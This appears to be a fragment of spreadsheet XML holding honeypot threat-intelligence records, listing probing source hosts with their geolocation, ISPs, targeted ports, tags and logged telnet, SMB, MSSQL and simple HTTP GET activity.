    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H38&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H16"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;3120&amp;&amp;80&amp;&amp;23&amp;&amp;46986&amp;&amp;47052&amp;&amp;9100&amp;&amp;36944"/>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2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:4185"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3580"/>
    <x v="3580"/>
    <s v="220-135-199-221.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T09:42:00"/>
    <d v="2024-04-14T10:34:27"/>
    <d v="2025-04-02T09:42:00"/>
    <n v="304"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;9205&amp;&amp;23&amp;&amp;55387&amp;&amp;41225&amp;&amp;80&amp;&amp;9100&amp;&amp;26058"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP: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None"/>
    <x v="31"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:dc87:c7dd"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3581"/>
    <x v="3581"/>
    <s v="pl46308.ag1001.nttpc.ne.jp&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T09:29:38"/>
    <d v="2025-04-02T08:51:52"/>
    <d v="2025-04-02T09:29:38"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="JP"/>
    <s v="Japan"/>
    <s v="13"/>
    <s v="Tokyo"/>
    <s v="Chiyoda"/>
    <s v="Chiyoda"/>
    <s v="11749713"/>
    <s v="100-8111"/>
    <s v="35.6906"/>
    <s v="139.77"/>
    <s v="2514"/>
    <s v="NTT PC Communications, Inc."/>
    <s v="NTT PC Communications, Inc."/>
    <s v="business"/>
    <s v="InfoSphere"/>
    <s v="2010-06-28"/>
    <s v="InfoSphere"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:121:55e4"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3582"/>
    <x v="3582"/>
    <s v="NA&amp;&amp;125-229-88-249.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T09:08:06"/>
    <d v="2024-12-23T13:00:57"/>
    <d v="2025-04-02T09:08:06"/>
    <n v="249"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="23&amp;&amp;9100&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login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7de5:58f9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3583"/>
    <x v="3583"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T08:36:28"/>
    <d v="2024-07-17T02:29:53"/>
    <d v="2025-04-02T08:36:28"/>
    <n v="221"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H38&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_LDAP_H7&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H37&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_SMB_H22&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H10&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;445&amp;&amp;389&amp;&amp;6800&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="Tirupati"/>
    <s v="Gūdūr"/>
    <s v="1270791"/>
    <s v="NA"/>
    <s v="14.1509"/>
    <s v="79.85210000000001"/>
    <s v="137000"/>
    <s v="VIJAYALAKSHMI NET SERVICES PVT LTD"/>
    <s v="Vijayalakshmi NET Services PVT LTD"/>
    <s v="business"/>
    <s v="Vijayalashmi NET Serverices PVT LTD"/>
    <s v="2020-03-09"/>
    <s v="VIJAYLAKSHMI-IN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,62027)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,54620)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,54681)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,55546)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,57046)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,52452)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,60239)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,54529)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,51845)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,51848)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,54710)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,54714)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,49799)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,58818)}&amp;&amp;{Data_SMB:Incoming connection (103.149.59.4,58092)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6795:3b04"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3584"/>
    <x v="3584"/>
    <s v="1-34-146-59.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T08:12:22"/>
    <d v="2023-10-07T08:38:00"/>
    <d v="2025-04-02T08:12:22"/>
    <n v="1007"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_MT-CPA_H8&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;43115&amp;&amp;32592&amp;&amp;23&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:ssh']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '193.57.136.113:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:122:923b"/>
    <s v="C-I_D"/>
    <s v="high"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3585"/>
    <x v="3585"/>
    <s v="114-35-101-113.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-02T08:08:41"/>
    <d v="2024-04-15T07:56:40"/>
    <d v="2025-04-02T08:08:41"/>
    <n v="337"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H19&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H20"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;59006&amp;&amp;20392&amp;&amp;23&amp;&amp;9100&amp;&amp;80&amp;&amp;NA"/>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2008-04-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7223:6571"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3586"/>
    <x v="3586"/>
    <s v="NA&amp;&amp;59-126-101-241.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T07:58:21"/>
    <d v="2024-10-28T09:30:38"/>
    <d v="2025-04-02T07:58:21"/>
    <n v="587"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H38"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;8222&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2005-10-18"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:3b7e:65f1"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3587"/>
    <x v="3587"/>
    <s v="NA&amp;&amp;169.6.90.146.dyn.plus.net"/>
    <x v="0"/>
    <d v="2025-04-02T07:56:52"/>
    <d v="2025-04-02T06:40:10"/>
    <d v="2025-04-02T07:56:52"/>
    <n v="12"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Greater London"/>
    <s v="London (Colindale)"/>
    <s v="2643743"/>
    <s v="NW9 6HP"/>
    <s v="51.5897"/>
    <s v="-0.249103"/>
    <s v="6871"/>
    <s v="British Telecommunications PLC"/>
    <s v="PlusNet plc"/>
    <s v="residential"/>
    <s v="PlusNet Plc"/>
    <s v="2011-07-11"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:925a:6a9"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3588"/>
    <x v="3588"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-02T07:54:05"/>
    <d v="2025-04-02T07:51:33"/>
    <d v="2025-04-02T07:54:05"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="DN"/>
    <s v="Da Nang"/>
    <s v="Quận Ngũ Hành Sơn"/>
    <s v="Ngũ Hành Sơn"/>
    <s v="8656412"/>
    <s v="NA"/>
    <s v="16.0162"/>
    <s v="108.253"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7116:ef10"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3589"/>
    <x v="3589"/>
    <s v="NA&amp;&amp;1-34-2-141.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-02T07:49:36"/>
    <d v="2024-12-08T05:25:25"/>
    <d v="2025-04-02T07:49:36"/>
    <n v="402"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="80&amp;&amp;23&amp;&amp;47211&amp;&amp;47219&amp;&amp;47220&amp;&amp;47225&amp;&amp;9100&amp;&amp;23971"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Taipei"/>
    <s v="1668341"/>
    <s v="NA"/>
    <s v="25.0334"/>
    <s v="121.566"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2010-05-05"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL: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None"/>
    <x v="31"/>
